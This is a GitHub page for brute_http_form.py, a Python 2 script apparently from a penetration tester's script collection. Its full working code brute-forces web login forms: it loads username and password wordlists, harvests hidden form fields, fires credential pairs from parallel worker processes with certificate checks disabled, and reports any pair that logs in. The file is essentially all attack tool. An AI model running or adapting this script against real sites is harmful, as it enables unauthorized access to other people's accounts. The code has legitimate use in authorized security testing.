forked from averagesecurityguy/scripts
-
Notifications
You must be signed in to change notification settings - Fork 4
/
brute_http_form.py
executable file
·154 lines (128 loc) · 5.22 KB
/
brute_http_form.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
# Copyright (c) 2013, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import requests
import multiprocessing
import sys
import Queue
import re
import json
import HTMLParser
import time
VERIFY = False
if VERIFY is False:
requests.packages.urllib3.disable_warnings()
# Class to parse HTML responses to find the needed hidden fields and to test
# for login success or failure.
class bruteParser(HTMLParser.HTMLParser):
def __init__(self, fail, hidden_fields):
HTMLParser.HTMLParser.__init__(self)
self.hidden = {}
self.hidden_fields = hidden_fields
self.fail_regex = fail
self.fail = False
def feed(self, data):
# Reset our fail flag before we process any data
self.fail = False
HTMLParser.HTMLParser.feed(self, data)
def handle_starttag(self, tag, attr):
if tag == 'input':
attribs = dict(attr)
if attribs['type'] == 'hidden':
if attribs['name'] in self.hidden_fields:
self.hidden[attribs['name']] = attribs['value']
def handle_data(self, data):
m = self.fail_regex.search(data)
# If we have a match, m is not None, on the fail_str then the login
# attempt was unsuccessful.
if m is not None:
self.fail = True
def load_config(f):
return json.loads(open(f).read())
def worker(login, action, parser, cred_queue, success_queue):
print '[*] Starting new worker thread.'
sess = requests.Session()
resp = sess.get(login, verify=VERIFY)
parser.feed(resp.content)
while True:
# If there are no creds to test, stop the thread
try:
creds = cred_queue.get(timeout=10)
except Queue.Empty:
print '[-] Credential queue is empty, quitting.'
return
# If there are good creds in the queue, stop the thread
if not success_queue.empty():
print '[-] Success queue has credentials, quitting'
return
# Check a set of creds. If successful add them to the success_queue
# and stop the thread.
auth = {config['ufield']: creds[0],
config['pfield']: creds[1]}
auth.update(parser.hidden)
resp = sess.post(action, data=auth, verify=VERIFY)
parser.feed(resp.content)
if parser.fail is True:
print '[-] Failure: {0}/{1}'.format(creds[0], creds[1])
else:
print '[+] Success: {0}/{1}'.format(creds[0], creds[1])
success_queue.put(creds)
return
time.sleep(config['wait'])
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'USAGE: brute_http_form.py config_file'
sys.exit()
config = load_config(sys.argv[1])
fail = re.compile(config['fail_str'], re.I | re.M)
cred_queue = multiprocessing.Queue()
success_queue = multiprocessing.Queue()
procs = []
# Create one thread for each processor.
for i in range(config['threads']):
p = multiprocessing.Process(target=worker,
args=(config['login'],
config['action'],
bruteParser(fail, config['hidden']),
cred_queue,
success_queue))
procs.append(p)
p.start()
for user in open(config['ufile']):
user = user.rstrip('\r\n')
if user == '':
continue
for pwd in open(config['pfile']):
pwd = pwd.rstrip('\r\n')
cred_queue.put((user, pwd))
# Wait for all worker processes to finish
for p in procs:
p.join()
while not success_queue.empty():
user, pwd = success_queue.get()
print 'User: {0} Pass: {1}'.format(user, pwd)